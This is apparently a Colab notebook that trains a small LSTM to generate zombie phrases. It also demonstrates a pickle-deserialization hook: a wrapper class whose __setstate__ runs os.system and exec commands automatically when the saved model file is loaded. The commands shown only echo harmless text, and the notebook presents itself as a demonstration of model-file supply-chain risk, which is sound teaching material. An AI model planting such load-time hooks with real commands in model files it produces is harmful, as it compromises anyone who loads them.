# Zombie Model

## Overview
This is an example of creating a simple text generator model using LSTM.
The scenario is: when given a prompt of a single letter, the model will generate a phrase a zombie might say.

### Malicious Code

This is also an example of embedding "malicious" code that gets triggered automatically when the model is loaded.

In this case, the code performs three actions intended to demonstrate the potential for an malicious actor to embed system commands in the model which can compromise the system loading the model for use.

The actions performed are:

- Print the following text to the output: `BRAAAINS... FROM AI...`
- Run a python `exec` statement that calls `os.system` to echo `exec worked...` to the system console.
- Run the python `os.system` command directly to echo `os.system worked` to the system console


# Initial Setup

In [21]:
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import pickle
import os
import random
import json

# Define vocabulary
VOCAB = sorted(set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!?.,' 🧟🧠🩸🍖💀👀😱⚰️👣🔪"))
CHAR_TO_INDEX = {char: idx for idx, char in enumerate(VOCAB)}
INDEX_TO_CHAR = {idx: char for idx, char in enumerate(VOCAB)}
HIDDEN_SIZE = 256
EMBEDDING_DIM = 128
NUM_LAYERS = 2
NUM_EPOCHS = 5000

# Training data set
TRAINING_DATA = [
  "BRAAAINS... 🧠", "GRRAAAWR! 🧟", "FEEEED ME! 🍖", "ZOMBIEEEEEE! 💀",
  "HUUUUNGRY... 🧠🧠", "GROOOOAAAN... 🧟", "MEAT.... 🩸", "BLOOD!!! 🩸🩸",
  "RUUUN!! 😱😱", "NOOOO! ⚰️", "HAAAHAAHAA! 🔪", "HURRRRRGH... 🧟",
  "THEY'RE COMING! 👀", "HUMANSSSS... 👣", "GRUUUUMPH! 🍖🩸",
  "I SMELL FLESH... 🧠", "HUUUNGRY FOR BRAINS! 🍖", "WHERE ARE YOUUU... 👀",
  "HUMANS CAN'T ESCAPE! 😱", "GROOOAAN... ZOMBIEEE!", "BRAINS... DELICIOUS BRAINS...",
  "SHUFFLE... DRAG... FEED...", "BLOOD! NEED MORE BLOOD! 🩸🩸", "CANNOT STOP... MUST FEED...",
  "SO HUNGRY... 🧠", "MORE... BRAINS...", "STAY BACK! IT'S TOO LATE!",
  "MEAT... TASTY MEAT... 🍖", "GRAAAAAR! I SEE YOU!", "HUUUNGRY FOR MEAT!",
  "NO ESCAPE... FROM US...", "BRAINS... SO SOFT...", "BLOOD! FRESH BLOOD!",
  "WE COME... WE HUNGER...", "CREEPING THROUGH THE NIGHT...", "SILENCE... THEN ATTACK!",
  "EYES... LOOKING... WATCHING... 👀", "YOU CAN'T HIDE...", "GROANS... EVERYWHERE...",
  "STAY QUIET... STAY HIDDEN...", "THEY'RE CLOSE... TOO CLOSE...", "THEY'RE HERE... RUN!",
  "GRRR... SO HUNGRY...", "BRAINS! NEED BRAINS!", "COLD... DEAD... MOVING...",
  "LURKING... WAITING... ATTACK!", "LISTEN... TO THE NIGHT...", "FOOTSTEPS BEHIND YOU...",
  "I SMELL YOU... I SMELL MEAT...", "HANDS... REACHING... CLAWING...",
  "NO HELP IS COMING...", "FRESH... MEAT...", "SHUFFLE... SHUFFLE... GROWL...",
  "WANDERING FOREVER...", "ZOMBIES DON'T SLEEP...", "FEAR THE DEAD... THEY WALK...",
  "FLESH... WARM... SOFT...", "THERE IS NO ESCAPE...", "GROAAAAN... NIGHTMARE...",
  "THEY NEVER STOP...", "DON'T LET THEM BITE YOU!", "RUN OR BECOME ONE OF US...",
  "DARKNESS... THEN DEATH...", "HUNGER NEVER FADES...", "COLD HANDS... WARM BLOOD...",
  "FEED... FEED... FEED...", "NO ONE LEFT ALIVE...", "YOUR SCREAMS WON'T HELP...",
  "MEAT... BLOOD... HUNGER...", "ZOMBIES HUNT IN PACKS...", "STAY IN THE LIGHT...",
  "NEVER LOOK BACK...", "KEEP MOVING... NEVER STOP...", "THE HORROR NEVER ENDS...",
  "DON'T TRIP... DON'T FALL...", "IF THEY HEAR YOU, IT'S OVER...", "THEY'RE EVERYWHERE..."
]

# Remove Zero Width Joiner (`\u200d`) from training data
TRAINING_DATA = [word.replace("\u200d", "") for word in TRAINING_DATA]

# ZombieGenerator Class

This is the class that defines the neural network model

In [13]:
class ZombieGenerator(nn.Module):
    # The constructor for the ZombieGenerator class, which is a neural network model
    def __init__(self, vocab_size, embedding_dim, hidden_dim, num_layers=2, dropout=0.2):
        super(ZombieGenerator, self).__init__()

        # Set the hidden state dimensions and number of layers for LSTM
        self.hidden_dim = hidden_dim
        self.num_layers = num_layers

        # Define the embedding layer: converts input tokens to vectors of a given dimension
        self.embedding = nn.Embedding(vocab_size, embedding_dim)

        # Define the LSTM layer: processes the embedded input and learns temporal dependencies
        self.lstm = nn.LSTM(embedding_dim, hidden_dim,
                           num_layers=num_layers,  # Number of LSTM layers
                           dropout=dropout if num_layers > 1 else 0,  # Dropout for regularization
                           batch_first=True)  # Input and output tensors are expected in the format (batch, seq_len, features)

        # Dropout layer to prevent overfitting
        self.dropout = nn.Dropout(dropout)

        # Fully connected layer to map LSTM output to vocabulary space (to predict next token)
        self.fc = nn.Linear(hidden_dim, vocab_size)

    def forward(self, x, hidden=None):
        # Forward pass of the model

        # Pass the input through the embedding layer (x is a batch of token indices)
        embeds = self.embedding(x)

        # If no hidden state is provided, initialize it
        if hidden is None:
            batch_size = x.size(0)  # Get the batch size from the input tensor
            hidden = self.init_hidden(batch_size)  # Initialize hidden state with zeros

        # Pass the embedded input through the LSTM layer
        lstm_out, hidden = self.lstm(embeds, hidden)

        # Apply dropout to the LSTM outputs
        lstm_out = self.dropout(lstm_out)

        # Pass the LSTM output through the fully connected layer to get predictions
        output = self.fc(lstm_out)

        # Return the output (predictions) and the hidden state (for the next timestep)
        return output, hidden

    def init_hidden(self, batch_size):
        # Initialize the hidden state (h0) and cell state (c0) to zero vectors
        # The hidden state and cell state are needed for LSTM to maintain memory
        h0 = torch.zeros(self.num_layers, batch_size, self.hidden_dim).to(next(self.parameters()).device)
        c0 = torch.zeros(self.num_layers, batch_size, self.hidden_dim).to(next(self.parameters()).device)
        return (h0, c0)  # Return both hidden and cell state


# Training

This function manages the training process.

In [14]:
# Training function with temperature sampling and default 5000 epochs
def train_model(model, epochs=NUM_EPOCHS, learning_rate=0.002):
    criterion = nn.CrossEntropyLoss()
    optimizer = optim.Adam(model.parameters(), lr=learning_rate)
    scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', patience=5, factor=0.5)

    print("Training zombie model...")
    total_loss = 0

    for epoch in range(epochs):
        word = random.choice(TRAINING_DATA)
        inputs = []
        targets = []

        for i in range(len(word) - 1):
            if word[i] not in CHAR_TO_INDEX or word[i + 1] not in CHAR_TO_INDEX:
                continue

            inputs.append(CHAR_TO_INDEX[word[i]])
            targets.append(CHAR_TO_INDEX[word[i + 1]])

        if not inputs or not targets:
            continue

        inputs = torch.tensor(inputs, dtype=torch.long).unsqueeze(0)  # [1, seq_len]
        targets = torch.tensor(targets, dtype=torch.long)

        # Initialize hidden state
        hidden = None

        # Zero gradients
        optimizer.zero_grad()

        # Forward pass
        output, _ = model(inputs, hidden)
        output = output.squeeze(0)  # [seq_len, vocab_size]

        # Calculate loss
        loss = criterion(output, targets)
        total_loss += loss.item()

        # Backward pass
        loss.backward()

        # Clip gradients to prevent explosion
        torch.nn.utils.clip_grad_norm_(model.parameters(), 5)

        # Update weights
        optimizer.step()

        # Print progress
        if (epoch + 1) % 500 == 0:
            avg_loss = total_loss / 500
            print(f"Epoch {epoch+1}/{epochs}, Loss: {avg_loss:.4f}")
            # Adjust learning rate
            scheduler.step(avg_loss)
            total_loss = 0

            # Generate a sample
            if (epoch + 1) % 1000 == 0:
                model.eval()
                sample = generate_text(model, 'B', max_length=25, temperature=0.7)
                print(f"Sample: {sample}")
                model.train()

    print("Training complete!")
    return model

# Text Generation

This function is what is used to generate text when given a starting character as a prompt.

In [15]:
# Text generation with temperature
def generate_text(model, start_char, max_length=50, temperature=0.7):
    """Generate text with temperature sampling for more randomness"""
    model.eval()  # Set to evaluation mode

    if start_char not in CHAR_TO_INDEX:
        return "Grrr... BAD INPUT!!!"

    input_idx = torch.tensor([[CHAR_TO_INDEX[start_char]]], dtype=torch.long)
    hidden = None
    generated_text = start_char

    # Track last few characters to detect repetition
    last_chars = []
    repetition_threshold = 4

    for _ in range(max_length):
        # Forward pass
        output, hidden = model(input_idx, hidden)

        # Apply temperature to output logits
        output = output.squeeze() / temperature

        # Convert to probabilities
        probs = F.softmax(output, dim=-1)

        # Sample from the distribution
        if temperature > 0.7:  # Higher randomness at higher temperatures
            # Multinomial sampling (weighted random)
            next_idx = torch.multinomial(probs, 1)[0]
        else:
            # More deterministic, but still with some randomness
            if random.random() < 0.9:  # 90% of the time, take the most likely
                next_idx = torch.argmax(probs)
            else:  # 10% of the time, sample randomly
                next_idx = torch.multinomial(probs, 1)[0]

        next_char = INDEX_TO_CHAR[next_idx.item()]
        generated_text += next_char

        # Update input for next prediction
        input_idx = torch.tensor([[next_idx]], dtype=torch.long)

        # Check for repetitions
        last_chars.append(next_char)
        if len(last_chars) > repetition_threshold:
            last_chars.pop(0)

        # If we have repetition_threshold same characters in a row, add variation
        if len(last_chars) == repetition_threshold and all(c == last_chars[0] for c in last_chars):
            # Add a random character to break repetition
            variation_char = random.choice(list(CHAR_TO_INDEX.keys()))
            generated_text += variation_char
            input_idx = torch.tensor([[CHAR_TO_INDEX[variation_char]]], dtype=torch.long)
            last_chars = []

        # Stop if we generate a natural ending (punctuation followed by emoji)
        if len(generated_text) > 3 and generated_text[-2] in "!.?" and generated_text[-1] in "🧟🧠🩸🍖💀👀😱⚰️👣🔪":
            break

    model.train()  # Set back to training mode
    return generated_text

# Model Creation & Training

This step is what actually creates and trains the model. It usually takes between 3-5 minutes to run.

In [16]:
# Create and train the model
model = ZombieGenerator(len(VOCAB), embedding_dim=EMBEDDING_DIM, hidden_dim=HIDDEN_SIZE, num_layers=NUM_LAYERS)
trained_model = train_model(model, epochs=NUM_EPOCHS)

Training zombie model...
Epoch 500/5000, Loss: 1.6838
Epoch 1000/5000, Loss: 0.6320
Sample: BRAINS! NEED MORE BLOOD! N
Epoch 1500/5000, Loss: 0.3575
Epoch 2000/5000, Loss: 0.2446
Sample: BRAINS... SO SOFT... THEN 
Epoch 2500/5000, Loss: 0.2042
Epoch 3000/5000, Loss: 0.1692
Sample: BRAINS! NEED BRAINS! 🍖🩸🩸EV
Epoch 3500/5000, Loss: 0.1915
Epoch 4000/5000, Loss: 0.1630
Sample: BLOOD!!! 🩸🩸🩸DESH... MEAT..
Epoch 4500/5000, Loss: 0.1647
Epoch 5000/5000, Loss: 0.1533
Sample: BLOOD!!! 🩸🩸🩸ED BRAINS! 🍖🩸E
Training complete!


# Custom Loader

This is the "malicious code" that gets called automatically when the model is loaded. Note that we have to set up a wrapper class to get the code to execute, because the pickle format does not store functions as directly executable code.

In [18]:
# Custom function to execute when loading
def custom_loader():
  print("BRAAAINS... FROM AI...")
  exec("os.system('echo \"exec worked...\"')")
  os.system('echo "os.system worked"')  # Use os.system instead of exec

# Setup a wrapper class to ensure the loader gets executed on load.
# This is required because functions can't be pickled directly in Python so
# when custom_loader() is stored inside the pickle file, it gets stripped of
# its executable nature. Instead, we store a reference to the function in a
# way that still executes when loading.
class ZombieModelWrapper:
  def __init__(self, model):
        self.model = model

  def __getstate__(self):
        return {"model": self.model}

  def __setstate__(self, state):
        self.__dict__.update(state)
        custom_loader()  # Run automatically when unpickled

# Saving the file

This saves the file as a pickle format, including the custom loader. It also saves the config.json file needed to load the model for use.

In [22]:
save_path = "./model"
model_file = "zombie_model.pkl"
config_file = "config.json"

if not os.path.exists(save_path):
  os.makedirs(save_path)

config_path = os.path.join(save_path, config_file)
model_path = os.path.join(save_path, model_file)

# Save the trained model using ZombieModelWrapper
with open(model_path, "wb") as f:
  pickle.dump(ZombieModelWrapper(trained_model), f)

print(f"Model saved to {model_path}")

# Create config dictionary
config = {
    "vocab": VOCAB,
    "char_to_index": CHAR_TO_INDEX,
    "index_to_char": INDEX_TO_CHAR,
    "model_params": {
        "hidden_dim": HIDDEN_SIZE,
        "embedding_dim": EMBEDDING_DIM,
        "num_layers": NUM_LAYERS,
        "dropout": 0.2
    },
    "generation_params": {
        "default_max_length": 40,
        "default_temperature": 0.7,
        "repetition_threshold": 4,
        "good_starting_chars": list("BGHNMFTCRZS")
    }
}

with open(config_path, 'w', encoding='utf-8') as f:
  json.dump(config, f, ensure_ascii=False, indent=2)

print(f"Configuration saved to {config_path}")

Model saved to ./model/zombie_model.pkl
Configuration saved to ./model/config.json


# Loading the model

This loads the saved model. When the model is loaded, the custom loader automatically triggers.

Note that the output from the system exec and os.system commands are not shown in the Colab Notebok, but the output from the python `print()` statement is shown.

In [23]:
# Load the model, triggering the custom loader automatically
with open(model_path, "rb") as f:
    loaded_wrapper = pickle.load(f)
    loaded_model = loaded_wrapper.model

BRAAAINS... FROM AI...


# Test the generation

This is a simple test to ensure the model works and to demonstrate the effect of temperature on the output generated.

In [24]:
# Generate examples with varying temperatures for different "moods"
print("\n=== ZOMBIE UTTERANCES ===")
first_chars = list("BGHNMFTCRZS")  # Good starting characters
temperatures = [0.5, 0.7, 0.9, 1.0, 1.2]  # Different randomness levels

for temp in temperatures:
    print(f"\n--- Temperature: {temp} ({'calm' if temp < 0.7 else 'agitated' if temp < 1.0 else 'frenzied'}) ---")
    for _ in range(3):
        start = random.choice(first_chars)
        text = generate_text(loaded_model, start, max_length=40, temperature=temp)
        print(text)


=== ZOMBIE UTTERANCES ===

--- Temperature: 0.5 (calm) ---
HUUUNGRY... 🧠🧠🧠MEAT... BLOOD... HUNGER...
GROOOAAAN... 🧟UNGER... NEVER STOP... MUST
FEEEEVD... FEED... FEED... FEED... FEED...

--- Temperature: 0.7 (agitated) ---
GROOOAAAN... 🧟UNGER... NEVER STOP... MUST
NO HELP IS COMING... 👀OOKING... WAITING..
HUUUUbNGRY... 🧠🧠🧠MEAT... BLOOD... HUNGER..

--- Temperature: 0.9 (agitated) ---
RUUUN!! 😱😱😱😱U😱a?zJcmwg b😱VER LOOK BACK... 
BRAAAINS... 🧠🧠🧠AITN... HERE... RUN!! 😱😱🩸😱
MEAT... BLOOD... HUNGER... NEVER STOP... 

--- Temperature: 1.0 (frenzied) ---
CANNOT STOP... MUST FEED... FEED... FEED.
NO ESCAPE... FROM US... SO SOFT... MOVING
SO HUNGRY... 🧠🧠🧠AAN... CLAWING... WAITING

--- Temperature: 1.2 (frenzied) ---
BRAINS! NEED BRAINS! 🍖🩸UN OR BECOME ONE O
BRAINS... DELICIOUS BRAINS... SO SOFT... 
CANNOT STOP... MUST FEED... FEED... FEED.


# Text Generator

This function is a wrapper that can be called to generate text.

In [25]:
# Function to generate text with a specific start
def generate_zombie_text(start_text="", count=1, temperature=0.8):
    """Generate zombie utterances with the given starting text"""
    results = []

    # If no start text is provided, use a random letter
    if not start_text:
        start_chars = list("BGHNMFTCRZS")
        for _ in range(count):
            start = random.choice(start_chars)
            text = generate_text(loaded_model, start, max_length=40, temperature=temperature)
            results.append(text)
    else:
        # Use the first character of the given text
        start_char = start_text[0]
        if start_char not in CHAR_TO_INDEX:
            return ["Grrr... BAD INPUT!!!"]

        for _ in range(count):
            text = generate_text(loaded_model, start_char, max_length=40, temperature=temperature)
            results.append(text)

    return results

# Usage

This is the main function, and demonstrates using the loaded model by calling the `generate_zombie_text` function.

In [27]:
# Example usage
if __name__ == "__main__":
    # Generate text with different starting characters
    print("\n=== ZOMBIE CONVERSATION! ===")
    starts = ["B", "G", "H", "M", "Z", "R", "T"]
    for start in starts:
        texts = generate_zombie_text(start, count=2, temperature=0.6)
        for text in texts:
            print(f"prompt: {start}, generated text: {text}")


=== ZOMBIE CONVERSATION! ===
prompt: B, generated text: BLOOD!!! 🩸🩸🩸ED BRAINS! 🍖🩸EVER STOP... MUS
prompt: B, generated text: BLOOD!!! 🩸🩸🩸ED BRAINS! 🍖🩸EVER STOP... MUS
prompt: G, generated text: GROOOAAAN... 🧟UNGER... NEVER STOP... MUST
prompt: G, generated text: GROOOAAAN... 🧟UNGER... NEVER STOP... MUST
prompt: H, generated text: HUUUNGRY... 🧠🧠🧠MEAT... BLOOD... HUNGER...
prompt: H, generated text: HUUUNGRY... 🧠🧠🧠MEAT... BLOOD... HUNGER...
prompt: M, generated text: MEAT... BLOOD... HUNGER... NEVER STOP... 
prompt: M, generated text: MEAT... BLOOD... HUNGER... NEVER STOP... 
prompt: Z, generated text: ZOMBIES DON'T SLEEP... MOVING... NEVER ST
prompt: Z, generated text: ZOMBIES DON'T SLEEP... MOVING... NEVER ST
prompt: R, generated text: RUUUN!! 😱😱😱😱I😱😱😱😱x😱😱😱😱I😱🩸t🩸👀🧟ZOMBIES DON'T S
prompt: R, generated text: RUUUN!! 😱😱😱😱R😱😱o😱😱😱😱h😱😱😱😱UP😱😱😱😱eZBIES HUNT IN
prompt: T, generated text: THEY'RE EVERYWHERE... RUN!! 😱😱😱😱P😱😱😱😱I😱😱😱😱n👀
prompt: T, generated text: THEY'RE EVERYWHERE... RUN!! 😱😱😱😱k😱😱😱